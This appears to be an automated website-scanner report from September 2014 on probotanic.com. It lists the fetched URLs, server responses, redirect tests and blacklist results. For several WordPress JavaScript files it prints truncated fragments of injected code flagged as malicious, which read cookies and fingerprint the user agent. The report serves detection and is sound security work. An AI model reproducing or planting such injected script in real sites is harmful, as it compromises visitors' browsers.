Scanned pages/files
Request | Server response | Status |
http://probotanic.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 16 Sep 2014 04:06:25 GMT Location: http://www.probotanic.com/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Set-Cookie: _icl_current_language=sr; expires=Wed, 17-Sep-2014 04:06:25 GMT; path=/ X-Pingback: http://www.probotanic.com/xmlrpc.php | clean |
http://www.probotanic.com/ | 200 OK Content-Length: 40848 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4 | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://www.probotanic.com/?ver=pprjq1 | 200 OK Content-Length: 9 Content-Type: text/javascript | clean |
http://www.probotanic.com/540ae28777eb2/js/lightbox.js?ver=3.3 | 200 OK Content-Length: 70459 Content-Type: text/javascript | clean |
http://www.probotanic.com/540ae28777eb2/inc/flowplayer/example/flowplayer-3.2.6.min.js?ver=3.0 | 200 OK Content-Length: 16807 Content-Type: text/javascript | clean |
http://www.probotanic.com/540ae28777eb2/inc/flowplayer/example/flowplayer.ipad-3.2.2.min.js?ver=3.0 | 200 OK Content-Length: 11633 Content-Type: text/javascript | clean |
http://www.probotanic.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.9.2 | 200 OK Content-Length: 5842 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.probotanic.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.9.2 | 200 OK Content-Length: 7908 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.probotanic.com/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js?ver=1.9.2 | 200 OK Content-Length: 2738 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.probotanic.com/wp-content/plugins/wordpress-simple-survey/js/custom.js?ver=2.1.2 | 200 OK Content-Length: 3642 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - return true; } } return ""; } (function($) { $(function() { $("#wpssform").submit(function(e){ $("#wpssform .infoForm input.wpss_required").each( function() { if($(this).val() == ""){ alert($(this).attr('alt')+" cannot be blank."); e.preventDefault(); return false; } }); }); }); })(jQuery); Antivirus reports:
| ||
http://www.probotanic.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.5 | 200 OK Content-Length: 1965 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.probotanic.com/wp-content/plugins/faq-you/js/faq-frontend.js | 200 OK Content-Length: 1413 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="joombanight=1; path=/; expires="+date.toUTCString(); } } Broadbandserviceactu(); function faq_showQuestion(id) { if(document.getElementById('faq-question-'+id).style.display == "none") { document.getElementById('faq-question-'+id).style.display="block"; } else { document.getElementById('faq-question-'+id).style.display="none"; } } Antivirus reports:
| ||
https://platform.twitter.com/widgets.js | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://probotanic.com//connect.facebook.net/en_US/all.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 16 Sep 2014 04:06:32 GMT Pragma: no-cache Location: http://www.probotanic.com/connect.facebook.net/en_US/all.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.probotanic.com/xmlrpc.php | clean |
http://www.probotanic.com/connect.facebook.net/en_us/all.js/ | 404 Not Found Content-Length: 39836 Content-Type: text/html | clean |
http://www.probotanic.com//connect.facebook.net/en_US/all.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Tue, 16 Sep 2014 04:06:33 GMT Pragma: no-cache Location: http://www.probotanic.com/connect.facebook.net/en_US/all.js/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.probotanic.com/xmlrpc.php | clean |
http://www.probotanic.com/test404page.js | 404 Not Found Content-Length: 39777 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: probotanic.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 16 Sep 2014 04:06:25 GMT
Location: http://www.probotanic.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=sr; expires=Wed, 17-Sep-2014 04:06:25 GMT; path=/
X-Pingback: http://www.probotanic.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: probotanic.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 16 Sep 2014 04:06:25 GMT
Location: http://www.probotanic.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: _icl_current_language=sr; expires=Wed, 17-Sep-2014 04:06:25 GMT; path=/
X-Pingback: http://www.probotanic.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: probotanic.com
Referer: http://www.google.com/search?q=probotanic.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: probotanic.com
Referer: http://www.google.com/search?q=probotanic.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=probotanic.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://probotanic.com/
Result: probotanic.com is not infected or malware details are not published yet.
Result: probotanic.com is not infected or malware details are not published yet.